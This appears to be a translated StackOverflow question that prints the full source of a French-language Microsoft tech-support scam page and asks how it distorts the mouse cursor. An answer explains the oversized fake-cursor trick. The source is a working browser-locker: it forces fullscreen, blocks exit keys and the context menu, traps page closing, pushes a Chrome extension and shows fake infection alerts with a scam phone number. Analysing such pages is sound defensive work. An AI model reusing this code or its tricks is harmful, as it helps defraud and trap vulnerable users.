这部分代码如何能够在浏览器窗口之外修改鼠标指针?

时间:2018-05-02 12:57:31

标签: javascript malware

技术支持诈骗者总是试图找到办法让窗户难以关闭以达到诈骗目的。

在这种情况下,此代码的一部分的目标是使用户难以检查:"阻止此页面创建其他对话框"否则受害者可以关闭窗口。它以某种方式弄乱了鼠标光标,使受害者难以悬停复选框。我不明白这是如何运作的:

我在StackOverflow中删除了一个大blob,但是可以在这里找到完整版本:https://pastebin.com/E57AQjGj

对于未来的访客,这里是光标(来自Tschallacka的答案),背景为灰色(通常是清晰的):

fake cursor

这是截至2018年5月的典型Microsoft技术支持骗局的代码:

<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title> Information </title>
<link href="index_files/bootstrap.css" rel="stylesheet">
<link href="index_files/style.css" rel="stylesheet">
<link href="index_files/translator.css" id="SL_Style" type="text/css" rel="stylesheet">
<link href="index_files/alert.css" rel="stylesheet">
<link href="https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi" rel="chrome-webstore-item">
<style>
  html {
    overflow: hidden;
  }
</style>
<script>
  /*
  window.alert = function(al) {
    return function(msg) {
      al(msg);
     var event = new CustomEvent('alert_clicked');
       document.dispatchEvent(event);
    };
  }(window.alert);

  document.addEventListener('alert_clicked', function() {
    setTimeout(function() {
      toggleFullScreen();
    }, 1000)
  }, false);
  */
</script>
<script>
  function getURLParameter(name) {
    return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [,null])[1] || '');
  }
  var error = getURLParameter('error');
</script>
<audio id="play" loop><source src="fr.mp3" type="audio/mpeg"></audio>
<!--<audio autoplay="autoplay" loop="">
  <source src="index_files/gb.mp3" type="audio/mpeg">
</audio>-->
<script type="text/javascript">
var stroka = "<tr><td valign='top'><table width='100%' height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src=''></td></tr></table></td></tr>";
</script>
<script type="text/javascript">
  function toggleFullScreen() {
    if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
      if (document.documentElement.requestFullscreen) {
        document.documentElement.requestFullscreen();
      } else if (document.documentElement.mozRequestFullScreen) {
        document.documentElement.mozRequestFullScreen();
      } else if (document.documentElement.webkitRequestFullscreen)
{document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
      }
    }
  }
</script>

<script type="text/javascript">
  document.addEventListener('keyup', function(es) {
    if (es.keyCode === 27) {
      toggleFullScreen();
    }
  }, false);
</script>

<script type="text/javascript">
  document.addEventListener('keyup', function(e) {
    if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
      document.getElementById('map').innerHTML = stroka;
      toggleFullScreen();
    }
  }, false);
</script>

<script type="text/javascript">
  window.onload = function () {
    document.onclick = function (e) {
      e = e || event;
      target = e.target || e.srcElement;

      if (target.tagName === "DIV") {
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
      } else {
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
      }
    }
  }
</script>

<script type="text/javascript">
  addEventListener("click", function() {
    document.getElementById('map').innerHTML = stroka;
     document.getElementById("play").play();
    if (!isFullScreen) {
      var el = document.documentElement,
          rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
      rfs.call(el);
    }
  });
</script>
</head>
<body  onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url(&quot;&quot;) 128 128, crosshair;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
    <source src="fr.mp3" type="audio/mpeg">
</audio>  
<div id="coFrameDiv" style="height:0px;display:none;">
  <iframe id="coToolbarFrame" src="index_files/a.htm" style="height:0px;width:100%;display:none;"></iframe>
</div>
<a id="elem" href="#" style="display: none;"></a>
<span id="audioarea"></span>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
  <tbody>
    <tr>
      <td valign="top" align="center"><div id="map"></div>
      </td>
    </tr>
  </tbody>
</table>
<nav class="navbar navbar-default navbar-static-tops">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
        <span class="sr-only">Navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="#">
        <img src="index_files/windows.png" alt="Windows">
      </a>
    </div>
    <div id="navbar" class="navbar-collapse collapse">
      <ul class="nav navbar-nav">
        <li class="dropdown">
          <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
          <ul class="dropdown-menu">
            <li><a href="#">Téléchargement </a></li>
            <li><a href="#">Devices</a></li>
            <li><a href="#">Software</a></li>
            <li><a href="#">Apps</a></li>
            <li><a href="#">Games</a></li>
          </ul>
        </li>
        <li class="dropdown">
          <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
          <ul class="dropdown-menu">
            <li><a href="#">Software &amp; services</a></li>
            <li><a href="#">Devices &amp; Xbox</a></li>
            <li><a href="#">For business</a></li>
          </ul>
        </li>
        <li><a href="#">Support</a></li>
      </ul>
      <ul class="nav navbar-nav navbar-right">
        <li><a href="#"><strong>Support technique : 09 70 38 74 17</strong></a></li>
      </ul>
    </div><!--/.nav-collapse-->
  </div>
</nav>
<div class="container">
  <div class="jumbotron">
    <div class="row">
      <div class="col-xs-6 text-left">
<h2>Attention</h2>
Ne pas éteindre ou réinitialiser votre ordinateur.
</br></br>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre     ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.

      </div>

    </div>
  </div>

</div> 

<footer class="footer">
  <div class="container">
    <div class="row">
      <div class="col-md-4" style="text-align:left;">
        <h4>Support</h4>
        <ul style="padding:0px;">
          <li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
        </ul>
      </div>
      <div class="col-md-4" style="text-align:left;">
        <h4>Security</h4>
        <ul style="padding:0px;">
          <li style="list-style: none; padding:10px 0px;"><a>Safety &amp; Security Center</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
        </ul>
      </div>
      <div class="col-md-4" style="text-align:left;">
        <h4>Popular topics</h4>
        <ul style="padding:0px;">
          <li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Locate Windows addresses worldwide</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Windows 10 help &amp; how-to</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help &amp; how-to</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
              Windows 8, or WIndows 7?</a></li>
        </ul>
      </div>
    </div>
    <div class="row" style="font-size: 1.2rem; padding:30px 0px;">
      <div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
      </div>
      <div style="float:right;">
        <span style="padding:0px 15px;">Terms of use</span>
        <span style="padding:0px 15px;">English(United States)</span>
        <span style="padding:0px 15px;">Trademarks</span>
        <span style="padding:0px 15px;">@2016 Windows</span>
      </div>
    </div>
  </div>
</footer>



<div id="chrome-alerts" class="chrome-alert">
  <div>
    <a href="javascript:openlink()" class="cross">×</a>
    <h1>Attention</h1>
    <div class="content-box" id="alert-content-box">
<p>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</p>
    </div>
    <label style="font-size: 12px;"><input type="checkbox"> Empêcher les boîtes de dialogue supplémentaires</label>
    <div class="action_buttons">
      <a class="active" id="leave_page">OK</a>
    </div>
  </div>
</div>
<script>
  var subid = '';
  var clickid = '';
  var postback = 'wHBAN004C9IFC3951PRAFUP0';
  var cl = false;
  var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
  window.onload = function () {
    var langs = {
      en: {
        img: 'ru_new.png',
        h3: 'System notification!',
        p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
      },
      ru: {
        img: 'ru_new.png',
        h3: '????????? ???????????!',
        p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
      },
      de: {
        img: 'ru_new.png',
        h3: 'Systembenachrichtigung!',
        p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
      },
      fr: {
        img: 'ru_new.png',
        h3: 'Avis de système !',
        p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
      },
      es: {
        img: 'ru_new.png',
        h3: '¡Notificación del sistema!',
        p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en  "Aceptar" e instale la extensión propuesta.'
      },
      pt: {
        img: 'ru_new.png',
        h3: 'Mensagem de sistema!',
        p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
      },
    };

    if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
      if (document.cookie.indexOf('tmp_name=') == -1) {
        setCookie('tmp_name', 'landing', 24);
      }
      var lang = langs[navigator.language];
      hTRnKeAy1lgYB4La();

      if (lang) {
        document.querySelector('header img').src = lang.img;
        document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
        document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
      }

      if (document.cookie.indexOf('c_open' + '=') === -1) {
        setCookie('c_open', 'landing', 1);
        window.location.href = window.location.href;
      }
      try {
        document.querySelector('footer').style.display = 'none';
        document.querySelector('header').style.display = 'block';
      } catch (e) {}

    } else {
      window.onbeforeunload = null;
      location.assign('#');
    }
  };
  window.onresize = function () {
    if (document.querySelector('header')) {
      if (window.innerHeight != screen.height) {
        document.querySelector('header').style.display = 'block';
        document.querySelector('footer').style.display = 'none';
      }
      else {
        document.querySelector('header').style.display = 'none';
        document.querySelector('footer').style.display = 'block';
      }
    }
  };
  window.onbeforeunload = function (ev) {
    return "You have to install extension !";
  };
  function kzogExQSrDChY4Iq() {
    eKxJS2GzrfWPEjgm();
    setTimeout(function () {
      document.body.webkitRequestFullscreen();
    }, 1000);
  }
  function setCookie(a, b, c) {
    var d = '';
    if (c) {
      var e = new Date();
      e.setTime(e.getTime() + (c * 60 * 60 * 1000));
      d = '; expires=' + e.toUTCString()
    }
    console.log(d);

    document.cookie = a + "=" + b + d + ";path=/";
  }
  function hTRnKeAy1lgYB4La() {
    if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
      window.onbeforeunload = null;
      location.assign('#');
    }
  }
  function gpAkSJDl9ENT5gLQ() {
    try {
      document.querySelector('footer').style.display = 'block';
      document.querySelector('header').style.display = 'none';
    } catch (e) {}
  }
  function eKxJS2GzrfWPEjgm() {
    gpAkSJDl9ENT5gLQ();
    try {
      document.webkitCancelFullScreen();
    } catch (e) { }
    try {
      document.cancelFullscreen();
    } catch (e) { }
    var xhr = new XMLHttpRequest();
    xhr.open('GET', "#", true);
    xhr.send();
    cl = true;
    chrome.webstore.install('', function () {
      window.onbeforeunload = null;
      var xhr = new XMLHttpRequest();
      xhr.open('GET', "#", true);
      xhr.onload = function () {
        if (clickid) {
          var xhrPostback = new XMLHttpRequest();
          xhrPostback.open('GET', '#', true);
          xhrPostback.onload = function () {
            var xhrPostback1 = new XMLHttpRequest();
            xhrPostback1.open('GET', '#', true);
            xhrPostback1.onload = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.onerror = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.send();
          };
          xhrPostback.onerror = function () {
            var xhrPostback1 = new XMLHttpRequest();
            xhrPostback1.open('GET', '#', true);
            xhrPostback1.onload = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.onerror = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.send();
          };
          xhrPostback.send();
        } else if (subid) {
          var xhrPostback = new XMLHttpRequest();
          xhrPostback.open('GET', '#' + subid, true);
          xhrPostback.onload = function () {
            open('#', '_self');
          };
          xhrPostback.onerror = function () {
            open('#', '_self');
          };
          xhrPostback.send();
        } else if (postback) {
          var xhrPostback = new XMLHttpRequest();
          xhrPostback.open('GET', '#' + postback, true);
          xhrPostback.onload = function () {
            open('#', '_self');
          };
          xhrPostback.onerror = function () {
            open('#', '_self');
          };
          xhrPostback.send();
        } else {
          open('#', '_self');
        }
      };
      xhr.onerror = function () {
        open('#', '_self');
      };
      xhr.send();
    }, function (error) {
        cl = false;
        var xhr = new XMLHttpRequest();
        xhr.open('GET', "#", true);
        xhr.send();
        console.log(error);
        document.querySelector('footer').style.display = 'none';
        try {
          document.querySelector('header').style.display = 'block';
        } catch (v) {
        }
        setTimeout(function () {
          try {
            document.webkitCancelFullScreen();
          } catch (e) { }
          try {
            document.cancelFullscreen();
          } catch (e) { }
        }, 100);
    });
  }
  function hCPNapvlhFicLoDm(e) {
    if (e.which === 123 || e.which === 17) {
      return false;
    }
  }
  function hxvw7JrbMUZBqVhN() {
    var c = confirm("You should install the chrome extension!");
    if (!c) {
      hxvw7JrbMUZBqVhN();
    }
  }
  // document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
  document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
  document.body.addEventListener('click', kzogExQSrDChY4Iq);
  function f5WOxk2dF74GMRLf() {
    return false;
  }
  function dsfsf(e) {
    e = e ? e : window.event;
    var from = e.relatedTarget || e.toElement;
    if (!from || from.nodeName === "HTML") {
      // hxvw7JrbMUZBqVhN()
        window.location.href = window.location.href;
    }
  }
  function addEvent(obj, evt, fn) {
    if (obj.addEventListener) {
      obj.addEventListener(evt, fn, false);
    } else if (obj.attachEvent) {
      obj.attachEvent("on" + evt, fn);
    }
  }
  function removeEvent(obj, evt, fn) {
    if (obj.removeEventListener) {
      obj.removeEventListener(evt, fn, false);
    } else if (obj.detachEvent) {
      obj.detachEvent("on" + evt, fn);
    }
  }
  //addEvent(document, "mouseout", dsfsf);
  window.onblur = function() {
    if (!isFullScreen && !cl) {
      window.location.href = window.location.href;
    }
  };
</script>
<script type="text/javascript">
  var nomer = getURLParameter("n");
  var red = getURLParameter("red");
  if (red === "y") {
    document.location.href=("https://" + document.location.host + document.location.pathname + "?n=" + nomer + "&error=" + error);
  }
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3638954,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript';     hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] ||             document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?3638954&101" alt="free hit counter code" border="0"></a></noscript>
</body>
</html>

1 个答案:

答案 0 :(得分:3)

他们通过将光标替换为128x128px的图像来实现。

请参阅下面的代码段并将鼠标悬停在按钮上。

这样,在您认为点击的地方,您就不会点击。你无法看到你点击的位置,而且你总是会错过这个小小的复选框标记。

&#13;
&#13;
button {
cursor: url("") 128 128, crosshair;
}
&#13;
<button>
test
</button>
&#13;
&#13;
&#13;